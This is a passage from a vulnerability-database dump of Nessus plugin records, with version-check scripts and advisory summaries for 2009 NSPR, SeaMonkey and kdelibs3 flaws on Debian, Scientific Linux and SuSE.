reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:44", "description": "Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code.\nThe Common Vulnerabilities and Exposures project identifies 
the\nfollowing problems :\n\n - CVE-2009-1563\n A programming error in the string handling code may lead\n to the execution of arbitrary code.\n\n - CVE-2009-2463\n An integer overflow in the Base64 decoding functions may\n lead to the execution of arbitrary code.", "edition": 28, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1931-1 : nspr - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689", "CVE-2009-2463"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:nspr"], "id": "DEBIAN_DSA-1931.NASL", "href": "https://www.tenable.com/plugins/nessus/44796", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1931. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44796);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-2463\");\n script_bugtraq_id(35769, 36851);\n script_xref(name:\"DSA\", value:\"1931\");\n\n script_name(english:\"Debian DSA-1931-1 : nspr - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems :\n\n - CVE-2009-1563\n A programming error in the string handling code may lead\n to the 
execution of arbitrary code.\n\n - CVE-2009-2463\n An integer overflow in the Base64 decoding functions may\n lead to the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-2463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1931\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the NSPR packages.\n\nThe old stable distribution (etch) doesn't contain nspr.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 4.7.1-5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libnspr4-0d\", reference:\"4.7.1-5\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libnspr4-0d-dbg\", reference:\"4.7.1-5\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libnspr4-dev\", reference:\"4.7.1-5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:44:33", "description": "A flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file\nSeaMonkey is going to download, they can replace the contents of that\nfile with arbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary\ncode with the privileges of the user running SeaMonkey.\n(CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A\nmalicious website may be able to read highlighted text in a different\ndomain (e.g. another website the user is viewing), bypassing the\nsame-origin policy. 
(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left\noverride character when downloading a file. In these cases, the name\ndisplayed in the title bar differs from the name displayed in the\ndialog body. An attacker could use this flaw to trick a user into\ndownloading a file that has a file name or extension that differs from\nwhat the user expected. (CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running SeaMonkey. (CVE-2009-3380)\n\nAfter installing the update, SeaMonkey must be restarted for the\nchanges to take effect.", "edition": 25, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20091027_SEAMONKEY_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60685", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60685);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-3274\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3380\");\n\n script_name(english:\"Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more 
security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file\nSeaMonkey is going to download, they can replace the contents of that\nfile with arbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary\ncode with the privileges of the user running SeaMonkey.\n(CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A\nmalicious website may be able to read highlighted text in a different\ndomain (e.g. another website the user is viewing), bypassing the\nsame-origin policy. (CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left\noverride character when downloading a file. In these cases, the name\ndisplayed in the title bar differs from the name displayed in the\ndialog body. An attacker could use this flaw to trick a user into\ndownloading a file that has a file name or extension that differs from\nwhat the user expected. (CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running SeaMonkey. 
(CVE-2009-3380)\n\nAfter installing the update, SeaMonkey must be restarted for the\nchanges to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0910&L=scientific-linux-errata&T=0&P=2336\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?66db570c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(16, 119, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-1.0.9-0.47.el3\")) flag++;\nif 
(rpm_check(release:\"SL3\", reference:\"seamonkey-chat-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-devel-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-dom-inspector-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-js-debugger-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-mail-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nspr-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nspr-devel-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nss-1.0.9-0.47.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nss-devel-1.0.9-0.47.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-chat-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-devel-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-dom-inspector-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-js-debugger-1.0.9-50.el4_8\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-mail-1.0.9-50.el4_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:12:12", "description": "KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689", "edition": 23, "published": "2009-12-08T00:00:00", "title": "SuSE 11 Security Update : kdelibs3 (SAT Patch Number 1639)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-08T00:00:00", "cpe": 
["p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style-32bit", "p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:kdelibs3", "p-cpe:/a:novell:suse_linux:11:kdelibs3-32bit"], "id": "SUSE_11_KDELIBS3-091202.NASL", "href": "https://www.tenable.com/plugins/nessus/43056", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43056);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 11 Security Update : kdelibs3 (SAT Patch Number 1639)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0689.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1639.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kdelibs3-default-style-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"kdelibs3-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"kdelibs3-default-style-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", 
reference:\"kdelibs3-default-style-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"kdelibs3-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"kdelibs3-default-style-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"kdelibs3-32bit-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"kdelibs3-default-style-32bit-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.10-23.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"kdelibs3-default-style-32bit-3.5.10-23.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:05:52", "description": "KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689", "edition": 21, "published": "2009-12-08T00:00:00", "title": "openSUSE Security Update : kdelibs3 (kdelibs3-1648)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kdelibs3-32bit", "p-cpe:/a:novell:opensuse:libkde4-devel", "p-cpe:/a:novell:opensuse:kdelibs3", "p-cpe:/a:novell:opensuse:libkdecore4-devel", "p-cpe:/a:novell:opensuse:libkde4-32bit", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:utempter", "p-cpe:/a:novell:opensuse:libkdecore4-32bit", "p-cpe:/a:novell:opensuse:kdelibs3-default-style", "p-cpe:/a:novell:opensuse:kdelibs3-devel", "p-cpe:/a:novell:opensuse:kdelibs4-core", "p-cpe:/a:novell:opensuse:kdelibs3-arts", "p-cpe:/a:novell:opensuse:kdelibs3-arts-32bit", "p-cpe:/a:novell:opensuse:kdelibs4-branding-upstream", "p-cpe:/a:novell:opensuse:libkde4", 
"p-cpe:/a:novell:opensuse:libkdecore4", "p-cpe:/a:novell:opensuse:kdelibs3-default-style-32bit", "p-cpe:/a:novell:opensuse:utempter-32bit", "p-cpe:/a:novell:opensuse:kdelibs4"], "id": "SUSE_11_2_KDELIBS3-091204.NASL", "href": "https://www.tenable.com/plugins/nessus/43055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kdelibs3-1648.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43055);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_name(english:\"openSUSE Security Update : kdelibs3 (kdelibs3-1648)\");\n script_summary(english:\"Check for the kdelibs3-1648 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557126\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs3 packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-arts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-arts-32bit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kdelibs3-default-style\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-default-style-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kdelibs4-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkde4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libkdecore4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:utempter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:utempter-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-arts-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-default-style-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs3-devel-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs4-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs4-branding-upstream-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"kdelibs4-core-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkde4-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkde4-devel-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkdecore4-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libkdecore4-devel-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"utempter-0.5.5-142.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"kdelibs3-arts-32bit-3.5.10-32.4.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"kdelibs3-default-style-32bit-3.5.10-32.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.3.1-6.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"utempter-32bit-0.5.5-142.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs3 / kdelibs4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:45:23", "description": "KDE KDELibs Remote Array Overrun (Arbitrary code execution),\nCVE-2009-0689", "edition": 23, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : kdelibs3 (ZYPP Patch Number 6692)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KDELIBS3-6692.NASL", "href": "https://www.tenable.com/plugins/nessus/49866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49866);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 10 Security Update : kdelibs3 (ZYPP Patch Number 6692)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n 
